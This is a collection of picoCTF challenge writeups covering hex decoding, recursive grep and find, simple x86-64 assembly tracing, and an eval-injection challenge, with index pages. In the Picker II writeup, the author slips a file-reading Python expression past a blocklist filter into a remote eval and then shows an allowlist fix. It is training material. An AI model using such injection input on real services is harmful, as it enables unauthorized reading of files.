Challenge link: [https://play.picoctf.org/practice/challenge/390](https://play.picoctf.org/practice/challenge/390)

## Solution

This challenge can easily be solved with [CyberChef's 'From Hex' recipe](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')) but that's no fun.

Let's write a python script called `solve.py` instead. The script uses both [lambda](https://docs.python.org/3/reference/expressions.html#lambda) and [map](https://docs.python.org/3/library/functions.html#map) functions.
```python
#!/usr/bin/python

# Create an array of the hex string numbers
enc_flag_array = "0x70 0x69 0x63 0x6f 0x43 0x54 0x46 0x7b 0x34 0x35 0x63 0x31 0x31 0x5f 0x6e 0x30 0x5f 0x71 0x75 0x33 0x35 0x37 0x31 0x30 0x6e 0x35 0x5f 0x31 0x6c 0x6c 0x5f 0x74 0x33 0x31 0x31 0x5f 0x79 0x33 0x5f 0x6e 0x30 0x5f 0x6c 0x31 0x33 0x35 0x5f 0x34 0x34 0x35 0x64 0x34 0x31 0x38 0x30 0x7d".split()

# Convert to numbers (int() with base 16 accepts the "0x" prefix)
num_array = map(lambda x: int(x, 16), enc_flag_array)

# Convert to chars
char_array = map(chr, num_array)

# Print the flag
print(''.join(char_array))
```

Then run the script to get the flag
```
┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/ASCII_Numbers]
└─$ python solve.py
picoCTF{}
```

For additional information, please see the references below.

## References

- [ASCII Table](https://www.asciitable.com/)
- [chr function - Python](https://docs.python.org/3/library/functions.html#chr)
- [CyberChef - Home page](https://gchq.github.io/CyberChef/)
- [lambda expression - Python](https://docs.python.org/3/reference/expressions.html#lambda)
- [map function - Python](https://docs.python.org/3/library/functions.html#map)
- [Wikipedia - ASCII](https://en.wikipedia.org/wiki/ASCII)

--------------------------------------------------------------------------------
/picoGym_Exclusive/General_Skills/Big_Zip.md:
--------------------------------------------------------------------------------
# Big Zip

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, General Skills
Author: LT 'SYREAL' JONES

Description:
Unzip this archive and find the flag.

Hints:
1. Can grep be instructed to look at every file in a directory and its subdirectories?
```
Challenge link: [https://play.picoctf.org/practice/challenge/322](https://play.picoctf.org/practice/challenge/322)

## Solution

Unzip the file
```
┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Big_Zip]
└─$ unzip big-zip-files.zip
Archive:  big-zip-files.zip
   creating: big-zip-files/
 extracting: big-zip-files/jpvaawkrpno.txt
  inflating: big-zip-files/oxbcyjsy.txt
  inflating: big-zip-files/hllhxlvvdgiii.txt
  inflating: big-zip-files/bdvnqbuutefealgveyiqd.txt
  inflating: big-zip-files/fudfsewmaafsbniiyktzr.txt
   creating: big-zip-files/folder_fqmjtuthge/
  inflating: big-zip-files/folder_fqmjtuthge/file_eaigogtrdslbxenbnfisxepj.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_ygocxgpzuxqjwfs.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_lqqprxhjtarithwygepdnlf.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_pdpygeaphbafepdzw.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_wwxeisxucykwqtkgcrkv.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_aowfebnypzsretakipi.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_jlfivzrgcubr.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_pnwvfhejwcqseezvmdv.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_lajnafrfzk.txt
  inflating: big-zip-files/folder_fqmjtuthge/file_zqjgjdxgn.txt
   creating: big-zip-files/folder_fqmjtuthge/folder_woanzvubrt/
< ---snip--- >
```

The file listing is long, so we definitely need to search for the flag with `grep`. Search
* recursively (-r),
* with extended regular expressions (-E),
* output only the matching text (-o), and
* suppress output of file names (-h).
```
┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Big_Zip]
└─$ grep -r -E -o -h 'picoCTF{.*}' big-zip-files
picoCTF{}
```

For additional information, please see the references below.

## References

- [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html)
- [unzip - Linux manual page](https://linux.die.net/man/1/unzip)

--------------------------------------------------------------------------------
/picoGym_Exclusive/General_Skills/First_Find.md:
--------------------------------------------------------------------------------
# First Find

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, General Skills
Author: LT 'SYREAL' JONES

Description:
Unzip this archive and find the file named 'uber-secret.txt'

Hints:
(None)
```
Challenge link: [https://play.picoctf.org/practice/challenge/320](https://play.picoctf.org/practice/challenge/320)

## Solution

Unzip the file
```
┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Fist_Find]
└─$ unzip files.zip
Archive:  files.zip
   creating: files/
   creating: files/satisfactory_books/
   creating: files/satisfactory_books/more_books/
  inflating: files/satisfactory_books/more_books/37121.txt.utf-8
  inflating: files/satisfactory_books/23765.txt.utf-8
  inflating: files/satisfactory_books/16021.txt.utf-8
  inflating: files/13771.txt.utf-8
   creating: files/adequate_books/
   creating: files/adequate_books/more_books/
   creating: files/adequate_books/more_books/.secret/
   creating: files/adequate_books/more_books/.secret/deeper_secrets/
   creating: files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/
 extracting: files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt
  inflating: files/adequate_books/more_books/1023.txt.utf-8
  inflating: files/adequate_books/46804-0.txt
  inflating: files/adequate_books/44578.txt.utf-8
   creating: files/acceptable_books/
   creating: files/acceptable_books/more_books/
  inflating: files/acceptable_books/more_books/40723.txt.utf-8
  inflating: files/acceptable_books/17880.txt.utf-8
  inflating: files/acceptable_books/17879.txt.utf-8
  inflating: files/14789.txt.utf-8
```

The path to the file is visible in the middle of the file listing (prefixed with `extracting`) but let's search for it anyway
```
┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Fist_Find]
└─$ find files -name uber-secret.txt
files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt
```

Finally, display the flag with `cat`
```
┌──(kali㉿kali)-[/picoCTF/picoGym/General_Skills/Fist_Find]
└─$ cat files/adequate_books/more_books/.secret/deeper_secrets/deepest_secrets/uber-secret.txt
picoCTF{}
```

For additional information, please see the references below.
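The two searches above, `find files -name uber-secret.txt` (First Find, where the file sits under a dot-directory) and `grep -r -E -o -h 'picoCTF{.*}'` (Big Zip, where the flag is somewhere in a large tree), are the same walk with different predicates. As an added example (my own code, not part of either write-up), the script below implements both in Python, walking hidden directories too, which a shell glob would skip. The flag pattern is tightened to stop at the first `}` so an unclosed `picoCTF{` does not match. The sample tree, file names and placeholder flags are constructed.

```python
"""Recursive search by file name and by content (added example)."""
import os
import re
import tempfile
from pathlib import Path

FLAG_RE = re.compile(rb"picoCTF\{[^}\n]*\}")


def find_by_name(root: str, name: str) -> list:
    """Equivalent of `find ROOT -name NAME`, including dot-directories."""
    matches = []
    for dirpath, _dirs, files in os.walk(root):
        if name in files:
            matches.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(matches)


def grep_tree(root: str, pattern) -> list:
    """Equivalent of `grep -r -E -o -h`: only the matched text, no file names."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            with open(os.path.join(dirpath, fname), "rb") as fh:
                for match in pattern.finditer(fh.read()):
                    hits.append(match.group(0).decode("ascii", "replace"))
    return hits


def build_sample_tree() -> str:
    """Constructed stand-in for the unzipped archives above; returns its root."""
    root = tempfile.mkdtemp(prefix="files_")
    samples = {
        "satisfactory_books/16021.txt.utf-8": b"lorem ipsum\n",
        "adequate_books/more_books/.secret/deeper_secrets/uber-secret.txt": b"picoCTF{constructed_first_find}\n",
        "big-zip-files/folder_a/file_b.txt": b"noise picoCTF{constructed_big_zip} more noise\n",
        "big-zip-files/decoy.txt": b"picoCTF{ is not a complete flag\n",
    }
    for rel, content in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    print(find_by_name(root, "uber-secret.txt"))
    print(grep_tree(root, FLAG_RE))
```

Reading files as bytes and matching with a bytes pattern is deliberate: `grep` does the same, so files that are not valid UTF-8 neither crash the scan nor hide a match.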

## References

- [cat - Linux manual page](https://man7.org/linux/man-pages/man1/cat.1.html)
- [find - Linux manual page](https://man7.org/linux/man-pages/man1/find.1.html)
- [unzip - Linux manual page](https://linux.die.net/man/1/unzip)

--------------------------------------------------------------------------------
/picoGym_Exclusive/General_Skills/README.md:
--------------------------------------------------------------------------------
# General Skills Challenges

3 Challenges:
- [ASCII Numbers](ASCII_Numbers.md)
- [Big Zip](Big_Zip.md)
- [First Find](First_Find.md)

--------------------------------------------------------------------------------
/picoGym_Exclusive/README.md:
--------------------------------------------------------------------------------
# picoGym Exclusive Challenges

## Binary Exploitation Challenges

1 Challenge:
- [Local Target](Binary_Exploitation/Local_Target.md)

## Forensics Challenges

1 Challenge:
- [WPA-ing Out](Forensics/WPA-ing_Out.md)

## General Skills Challenges

3 Challenges:
- [ASCII Numbers](General_Skills/ASCII_Numbers.md)
- [Big Zip](General_Skills/Big_Zip.md)
- [First Find](General_Skills/First_Find.md)

## Reverse Engineering Challenges

13 Challenges:
- [ASCII FTW](Reverse_Engineering/ASCII_FTW.md)
- [Bit-O-Asm-1](Reverse_Engineering/Bit-O-Asm-1.md)
- [Bit-O-Asm-2](Reverse_Engineering/Bit-O-Asm-2.md)
- [Bit-O-Asm-3](Reverse_Engineering/Bit-O-Asm-3.md)
- [Bit-O-Asm-4](Reverse_Engineering/Bit-O-Asm-4.md)
- [GDB baby step 1](Reverse_Engineering/GDB_baby_step_1.md)
- [GDB baby step 2](Reverse_Engineering/GDB_baby_step_2.md)
- [GDB baby step 3](Reverse_Engineering/GDB_baby_step_3.md)
- [GDB baby step 4](Reverse_Engineering/GDB_baby_step_4.md)
- [Picker I](Reverse_Engineering/Picker_I.md)
- [Picker II](Reverse_Engineering/Picker_II.md)
- [Picker III](Reverse_Engineering/Picker_III.md)
- [Picker IV](Reverse_Engineering/Picker_IV.md)

## Web Exploitation Challenges

1 Challenge:
- [JAuth](Web_Exploitation/JAuth.md)

--------------------------------------------------------------------------------
/picoGym_Exclusive/Reverse_Engineering/Bit-O-Asm-1.md:
--------------------------------------------------------------------------------
# Bit-O-Asm-1

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, Reverse Engineering, X86_64
Author: LT 'SYREAL' JONES

Description:
Can you figure out what is in the eax register?

Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base.
If the answer was 0x11 your flag would be picoCTF{17}.

Hints:
1. As with most assembly, there is a lot of noise in the instruction dump.
Find the one line that pertains to this question and don't second guess yourself!
```
Challenge link: [https://play.picoctf.org/practice/challenge/391](https://play.picoctf.org/practice/challenge/391)

## Solution

Study the assembler listing to figure out what happens. The interesting line is prefixed with `<+15>`.
For more information on the x64 instruction set, see references below.
```
<+0>: endbr64
<+4>: push rbp
<+5>: mov rbp,rsp
<+8>: mov DWORD PTR [rbp-0x4],edi
<+11>: mov QWORD PTR [rbp-0x10],rsi
<+15>: mov eax,0x30
<+20>: pop rbp
<+21>: ret
```

The flag should be in decimal format, so convert it in Python:
```
┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Bit-O-Asm-1]
└─$ python
Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x30
48
```

Finally, create the flag like this `picoCTF{}`.

## References

Intel 64 and IA-32 Architectures Developer's Manuals in PDF format
- [Volume 2A: Instruction Set Reference, A-M](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2a-manual.pdf)
- [Volume 2B: Instruction Set Reference, M-U](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2b-manual.pdf)
- [Volume 2C: Instruction Set Reference, V-Z](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2c-manual.pdf)
--------------------------------------------------------------------------------
/picoGym_Exclusive/Reverse_Engineering/Bit-O-Asm-2.md:
--------------------------------------------------------------------------------
# Bit-O-Asm-2

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, Reverse Engineering, X86_64
Author: LT 'SYREAL' JONES

Description:
Can you figure out what is in the eax register?

Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base.
If the answer was 0x11 your flag would be picoCTF{17}.

Hints:
1. PTR's or 'pointers', reference a location in memory where values can be stored.
```
Challenge link: [https://play.picoctf.org/practice/challenge/392](https://play.picoctf.org/practice/challenge/392)

## Solution

Study the assembler listing to figure out what happens. The interesting line is the one prefixed with `<+15>`.
The RBP register points to the current stack frame. For more information on the x64 instruction set, see the references below.
```
<+0>: endbr64
<+4>: push rbp
<+5>: mov rbp,rsp
<+8>: mov DWORD PTR [rbp-0x14],edi
<+11>: mov QWORD PTR [rbp-0x20],rsi
<+15>: mov DWORD PTR [rbp-0x4],0x9fe1a
<+22>: mov eax,DWORD PTR [rbp-0x4]
<+25>: pop rbp
<+26>: ret
```

The flag should be in decimal format, so convert it in Python:
```
┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Bit-O-Asm-2]
└─$ python
Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x9fe1a
654874
```

Finally, create the flag like this `picoCTF{}`.

## References

Intel 64 and IA-32 Architectures Developer's Manuals in PDF format
- [Volume 2A: Instruction Set Reference, A-M](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2a-manual.pdf)
- [Volume 2B: Instruction Set Reference, M-U](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2b-manual.pdf)
- [Volume 2C: Instruction Set Reference, V-Z](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2c-manual.pdf)
--------------------------------------------------------------------------------
/picoGym_Exclusive/Reverse_Engineering/Bit-O-Asm-3.md:
--------------------------------------------------------------------------------
# Bit-O-Asm-3

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, Reverse Engineering, X86_64
Author: LT 'SYREAL' JONES

Description:
Can you figure out what is in the eax register?

Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base.
If the answer was 0x11 your flag would be picoCTF{17}.

Hints:
1. Not everything in this disassembly listing is optimal.
```
Challenge link: [https://play.picoctf.org/practice/challenge/393](https://play.picoctf.org/practice/challenge/393)

## Solution

Study the assembler listing to figure out what happens. The interesting lines are the ones prefixed with `<+15>` through `<+36>`.
The RBP register points to the current stack frame.
```
<+0>: endbr64
<+4>: push rbp
<+5>: mov rbp,rsp
<+8>: mov DWORD PTR [rbp-0x14],edi
<+11>: mov QWORD PTR [rbp-0x20],rsi
<+15>: mov DWORD PTR [rbp-0xc],0x9fe1a
<+22>: mov DWORD PTR [rbp-0x8],0x4
<+29>: mov eax,DWORD PTR [rbp-0xc]
<+32>: imul eax,DWORD PTR [rbp-0x8]
<+36>: add eax,0x1f5
<+41>: mov DWORD PTR [rbp-0x4],eax
<+44>: mov eax,DWORD PTR [rbp-0x4]
<+47>: pop rbp
<+48>: ret
```

In more detail, the following happens:
* The stack slot at rbp-0xc is set to 0x9fe1a
* The stack slot at rbp-0x8 is set to 0x4
* EAX is set to the value at rbp-0xc (i.e. 0x9fe1a)
* EAX is multiplied by the value at rbp-0x8 (i.e. 0x4)
* 0x1f5 is added to EAX

The final two `mov` instructions only store EAX to rbp-0x4 and load it straight back, so they do not change the result.
For more information on the x64 instruction set, see the references below.

The flag should be in decimal format, so convert it in Python:
```
┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Bit-O-Asm-3]
└─$ python
Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> 0x9fe1a*4 + 0x1f5
2619997
```

Finally, create the flag like this `picoCTF{}`.
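Instead of tracing the arithmetic by hand, the three Bit-O-Asm listings above can be run through a tiny interpreter for just the `mov`, `imul` and `add` forms they use. The code below is an added example, not part of the original writeups: it parses the Intel-syntax operands GDB prints, keeps a map of stack slots relative to `rbp`, and returns the 32-bit value in `eax` at `ret`. The listings are copied from the challenges; starting every register at 0 (argc/argv in `edi`/`rsi` never reach `eax` here) and treating the frame-setup instructions as no-ops are assumptions of this example.

```python
import re

# Constructed copies of the listings from Bit-O-Asm-1, -2 and -3
# (Intel syntax, as GDB prints them) - the inputs this emulator was written for.
LISTING_1 = """\
<+0>: endbr64
<+4>: push rbp
<+5>: mov rbp,rsp
<+8>: mov DWORD PTR [rbp-0x4],edi
<+11>: mov QWORD PTR [rbp-0x10],rsi
<+15>: mov eax,0x30
<+20>: pop rbp
<+21>: ret
"""

LISTING_2 = """\
<+0>: endbr64
<+4>: push rbp
<+5>: mov rbp,rsp
<+8>: mov DWORD PTR [rbp-0x14],edi
<+11>: mov QWORD PTR [rbp-0x20],rsi
<+15>: mov DWORD PTR [rbp-0x4],0x9fe1a
<+22>: mov eax,DWORD PTR [rbp-0x4]
<+25>: pop rbp
<+26>: ret
"""

LISTING_3 = """\
<+0>: endbr64
<+4>: push rbp
<+5>: mov rbp,rsp
<+8>: mov DWORD PTR [rbp-0x14],edi
<+11>: mov QWORD PTR [rbp-0x20],rsi
<+15>: mov DWORD PTR [rbp-0xc],0x9fe1a
<+22>: mov DWORD PTR [rbp-0x8],0x4
<+29>: mov eax,DWORD PTR [rbp-0xc]
<+32>: imul eax,DWORD PTR [rbp-0x8]
<+36>: add eax,0x1f5
<+41>: mov DWORD PTR [rbp-0x4],eax
<+44>: mov eax,DWORD PTR [rbp-0x4]
<+47>: pop rbp
<+48>: ret
"""

MASK32 = 0xFFFFFFFF          # eax is 32 bits wide; results wrap like the CPU's do
INSN_RE = re.compile(r"<\+\d+>:\s+(\w+)(?:\s+(.*))?")
MEM_RE = re.compile(r"(?:DWORD|QWORD) PTR \[rbp-(0x[0-9a-fA-F]+)\]")


def _read(state, operand):
    """Value of a stack slot (keyed by its offset below rbp), an immediate, or a register."""
    mem = MEM_RE.fullmatch(operand)
    if mem:
        return state["stack"].get(int(mem.group(1), 16), 0)
    if operand.startswith("0x") or operand.isdigit():
        return int(operand, 0)
    return state["regs"].get(operand, 0)   # assumption: unset registers read as 0


def _write(state, operand, value):
    mem = MEM_RE.fullmatch(operand)
    if mem:
        state["stack"][int(mem.group(1), 16)] = value & MASK32
    else:
        state["regs"][operand] = value & MASK32


def eax_after(listing):
    """Walk the listing and return the value left in eax when `ret` is reached."""
    state = {"regs": {}, "stack": {}}
    for line in listing.strip().splitlines():
        m = INSN_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsable line: {line!r}")
        mnemonic, rest = m.group(1), m.group(2) or ""
        ops = [o.strip() for o in rest.split(",")] if rest else []
        if mnemonic in ("endbr64", "push", "pop"):
            continue                      # frame bookkeeping; no effect on eax
        if mnemonic == "ret":
            break
        if mnemonic == "mov":
            _write(state, ops[0], _read(state, ops[1]))
        elif mnemonic == "add":
            _write(state, ops[0], _read(state, ops[0]) + _read(state, ops[1]))
        elif mnemonic == "imul" and len(ops) == 2:
            _write(state, ops[0], _read(state, ops[0]) * _read(state, ops[1]))
        else:                             # fail loudly rather than return a wrong flag
            raise NotImplementedError(f"unsupported instruction: {line!r}")
    return state["regs"].get("eax", 0)


def flag(listing):
    """Format the decimal eax value the way the challenges ask for it."""
    return f"picoCTF{{{eax_after(listing)}}}"


if __name__ == "__main__":
    for name, lst in (("Bit-O-Asm-1", LISTING_1), ("Bit-O-Asm-2", LISTING_2), ("Bit-O-Asm-3", LISTING_3)):
        print(name, flag(lst))
```

Unknown mnemonics raise instead of being skipped: in a listing with a `sub`, `shl` or single-operand `imul`, silently ignoring the instruction would produce a plausible-looking but wrong value.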

## References

Intel 64 and IA-32 Architectures Developer's Manuals in PDF format
- [Volume 2A: Instruction Set Reference, A-M](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2a-manual.pdf)
- [Volume 2B: Instruction Set Reference, M-U](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2b-manual.pdf)
- [Volume 2C: Instruction Set Reference, V-Z](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-2c-manual.pdf)
--------------------------------------------------------------------------------
/picoGym_Exclusive/Reverse_Engineering/Picker_II.md:
--------------------------------------------------------------------------------
# Picker II

- [Challenge information](#challenge-information)
- [Solution](#solution)
- [References](#references)

## Challenge information
```
Points: 100
Tags: picoGym Exclusive, Reverse Engineering, Python
Author: LT 'SYREAL' JONES

Description:
Can you figure out how this program works to get the flag?

Connect to the program with netcat:
`$ nc saturn.picoctf.net 59461`

Hints:
1. Can you do what win does with your input to the program?
```
Challenge link: [https://play.picoctf.org/practice/challenge/401](https://play.picoctf.org/practice/challenge/401)

## Solution

### Study the source code

Let's start by studying the "main" part of the Python program.
```python
while(True):
    try:
        user_input = input('==> ')
        if( filter(user_input) ):
            eval(user_input + '()')
        else:
            print('Illegal input')
    except Exception as e:
        print(e)
```

The `filter` function is new and will make things somewhat harder for us. It only rejects input that contains the substring `win`; everything else is still passed to `eval`.
```python
def filter(user_input):
    if 'win' in user_input:
        return False
    return True
```

The `win` function is the same as in the previous 'Picker I' challenge.
```python
def win():
    # This line will not work locally unless you create your own 'flag.txt' in
    # the same directory as this script
    flag = open('flag.txt', 'r').read()
    #flag = flag[:-1]
    flag = flag.strip()
    str_flag = ''
    for c in flag:
        str_flag += str(hex(ord(c))) + ' '
    print(str_flag)
```

### Do a test run

Let's try to call the `win` function directly:
```
┌──(kali㉿kali)-[/picoCTF/picoGym/Reverse_Engineering/Picker_II]
└─$ nc saturn.picoctf.net 59461
==> win
Illegal input
==> Win
name 'Win' is not defined
```

### Get the flag

Finally, let's read the flag directly as suggested in the hint:
```
==> print(open('flag.txt', 'r').read())
picoCTF{}
'NoneType' object is not callable
==>
```

The error after the flag is harmless: `print(...)` returns `None`, and the `()` the program appends then tries to call it.

For additional information, please see the references below.
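The root cause here is a substring blocklist guarding an `eval`, which the challenge is designed to let through. As an added example (not the challenge's code, though it reproduces the challenge's `filter` for comparison), the block below puts that blocklist beside the fix a defender would apply: an explicit allowlist of command names looked up in a dictionary, so user input is never evaluated as code. The `hello` command is a hypothetical stand-in for a program's real menu entries.

```python
# Blocklist-plus-eval (the challenge's pattern) versus allowlist dispatch.


def blocklist_filter(user_input: str) -> bool:
    """Copy of the challenge's filter(): rejects only input containing 'win'."""
    return 'win' not in user_input


def hello() -> str:
    # Hypothetical harmless command standing in for a real program's menu entries.
    return "Hello!"


def vulnerable_dispatch(user_input: str):
    """One iteration of the challenge's loop: blocklist check, then eval of the
    input with '()' appended. Any input that avoids the substring is executed,
    including expressions that are not command names at all."""
    if not blocklist_filter(user_input):
        return "Illegal input"
    return eval(user_input + '()')


# The hardened form: the only things a user can invoke are the names listed here.
COMMANDS = {
    "hello": hello,
}


def safe_dispatch(user_input: str, commands=COMMANDS):
    """Run a command only if the exact, stripped name is in the allowlist.
    No eval, so there is no expression syntax to smuggle code through."""
    func = commands.get(user_input.strip())
    if func is None:
        return "Illegal input"
    return func()


if __name__ == "__main__":
    for text in ("hello", "win", "print(open('flag.txt', 'r').read())"):
        print(f"{text!r:40} blocklist passes: {blocklist_filter(text)!s:5} "
              f"allowlist result: {safe_dispatch(text)!r}")
```

The input from the writeup's "Get the flag" step passes `blocklist_filter` (it contains no `win`) but is rejected by `safe_dispatch`, because it is not one of the allowlisted names. The same `'NoneType' object is not callable` seen in the writeup comes from `vulnerable_dispatch`: `print(...)` evaluates to `None` and the appended `()` calls it.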

## References

- [Reading and writing files - Python](https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files)
--------------------------------------------------------------------------------
/picoGym_Exclusive/Reverse_Engineering/README.md:
--------------------------------------------------------------------------------
# Reverse Engineering Challenges

13 Challenges:
- [ASCII FTW](ASCII_FTW.md)
- [Bit-O-Asm-1](Bit-O-Asm-1.md)
- [Bit-O-Asm-2](Bit-O-Asm-2.md)
- [Bit-O-Asm-3](Bit-O-Asm-3.md)
- [Bit-O-Asm-4](Bit-O-Asm-4.md)
- [GDB baby step 1](GDB_baby_step_1.md)
- [GDB baby step 2](GDB_baby_step_2.md)
- [GDB baby step 3](GDB_baby_step_3.md)
- [GDB baby step 4](GDB_baby_step_4.md)
- [Picker I](Picker_I.md)
- [Picker II](Picker_II.md)
- [Picker III](Picker_III.md)
- [Picker IV](Picker_IV.md)
--------------------------------------------------------------------------------
/picoGym_Exclusive/Web_Exploitation/README.md:
--------------------------------------------------------------------------------
# Web Exploitation Challenges

1 Challenge:
- [JAuth](JAuth.md)
--------------------------------------------------------------------------------
/picoGym_Exclusive/Web_Exploitation/The_Token_Cookie_in_DevTools.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoGym_Exclusive/Web_Exploitation/The_Token_Cookie_in_DevTools.png
--------------------------------------------------------------------------------
/picoMini_by_redpwn/Binary_Exploitation/README.md:
--------------------------------------------------------------------------------
# Binary Exploitation Challenges

1 Challenge:
- [clutter-overflow](clutter-overflow.md)
--------------------------------------------------------------------------------
/picoMini_by_redpwn/Cryptography/README.md:
--------------------------------------------------------------------------------
# Cryptography Challenges

3 Challenges:
- [spelling-quiz](spelling-quiz.md)
- [triple-secure](triple-secure.md)
- [XtraORdinary](XtraORdinary.md)
--------------------------------------------------------------------------------
/picoMini_by_redpwn/Forensics/README.md:
--------------------------------------------------------------------------------
# Forensics Challenges

1 Challenge:
- [advanced-potion-making](advanced-potion-making.md)
--------------------------------------------------------------------------------
/picoMini_by_redpwn/README.md:
--------------------------------------------------------------------------------
# picoMini by redpwn Challenges

## Binary Exploitation Challenges

1 Challenge:
- [clutter-overflow](Binary_Exploitation/clutter-overflow.md)

## Cryptography Challenges

3 Challenges:
- [spelling-quiz](Cryptography/spelling-quiz.md)
- [triple-secure](Cryptography/triple-secure.md)
- [XtraORdinary](Cryptography/XtraORdinary.md)

## Forensics Challenges

1 Challenge:
- [advanced-potion-making](Forensics/advanced-potion-making.md)

## Reverse Engineering Challenges

1 Challenge:
- [not crypto](Reverse_Engineering/not_crypto.md)

## Web Exploitation Challenges

2 Challenges:
- [caas](Web_Exploitation/caas.md)
- [login](Web_Exploitation/login.md)
--------------------------------------------------------------------------------
/picoMini_by_redpwn/Reverse_Engineering/README.md:
--------------------------------------------------------------------------------
# Reverse Engineering Challenges

1 Challenge:
- [not crypto](not_crypto.md)
--------------------------------------------------------------------------------
/picoMini_by_redpwn/Web_Exploitation/README.md:
--------------------------------------------------------------------------------
# Web Exploitation Challenges

2 Challenges:
- [caas](caas.md)
- [login](login.md)
--------------------------------------------------------------------------------
/picoctf_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoctf_logo.png
--------------------------------------------------------------------------------